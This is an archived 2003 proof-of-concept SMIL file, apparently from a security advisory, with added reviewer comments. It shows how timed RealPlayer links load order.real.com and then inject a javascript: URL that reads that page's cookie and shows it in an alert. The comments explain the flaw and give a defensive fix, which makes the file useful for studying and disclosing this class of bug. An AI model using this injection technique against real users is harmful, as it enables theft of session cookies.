// This SMIL file reads the cookie from https://order.real.com/pt/order.html.
// The cookie is read 9 seconds after the audio has begun.
<!--
  Proof-of-concept SMIL presentation. Two timed <area> links on the audio
  clip are both routed to the player's "_rpcontextwin" target via rn:sendTo:
  the first loads an HTTPS page at 1s, the second sends a javascript: URL to
  the same target at 9s. Per the header note, the script then runs against
  the page loaded by the first link and can read its cookie.
  NOTE(review): several quoted attribute values below are split across lines;
  this looks like line wrapping from the archived copy rather than the
  author's layout. Confirm against the original advisory.
-->
<smil xmlns="http://www.w3.org/2001/SMIL20/Language"
xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
<!-- Descriptive metadata only; nothing in <head> affects the behaviour shown below. -->
<head>
<meta name="title" content="DigitalPranksters.com
Proof of Concept"/>
<meta name="author"
content="DigitalPranksters.com"/>
<meta name="copyright" content="(c)2003
DigitalPranksters.com"/>
</head>
<body>
<!--
  The audio clip supplies the timeline that the two links are scheduled on.
  NOTE(review): the src URL contains a literal "..." and so appears to have
  been shortened in this copy.
-->
<audio
src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio
/real/live.ram?service=vr">
<!--
  Link 1: one second into playback the order page is sent to _rpcontextwin.
  actuate="onLoad" means the link is followed automatically, with no click
  from the listener; sourcePlaystate="play" keeps the audio running.
  The rn:param children request width and height 10, presumably the size
  of the target pane (to be confirmed).
-->
<area href="https://order.real.com/pt/order.html"
begin="1s" external="true"
actuate="onLoad" sourcePlaystate="play"
rn:sendTo="_rpcontextwin">
<rn:param name="width" value="10"/>
<rn:param name="height" value="10"/>
</area>
<!--
  Link 2: nine seconds in, a javascript: URL is sent to the same target.
  The script only displays document.domain, location.protocol and
  document.cookie in an alert box.
  Defensive takeaway: a media player should not accept script-scheme URLs
  from a presentation file for a pane that may hold another site's document;
  limiting media-supplied hrefs to http and https closes this path.
  Cookies flagged HttpOnly are not exposed through document.cookie, though
  script running in the page's origin could still act on the page itself.
-->
<area href="javascript:alert('Hi there! I\'m a digital
prankster. I just read your cookie
from ' + document.domain +
' over the ' + location.protocol + '// protocol.\n\nThe value was:\n' +
document.cookie +
'\n\nHave a nice day.')"
begin="9s" external="true" actuate="onLoad"
sourcePlaystate="play" rn:sendTo="_rpcontextwin"/>
</audio>
</body>
</smil>
securitydot.net - 2003-08-28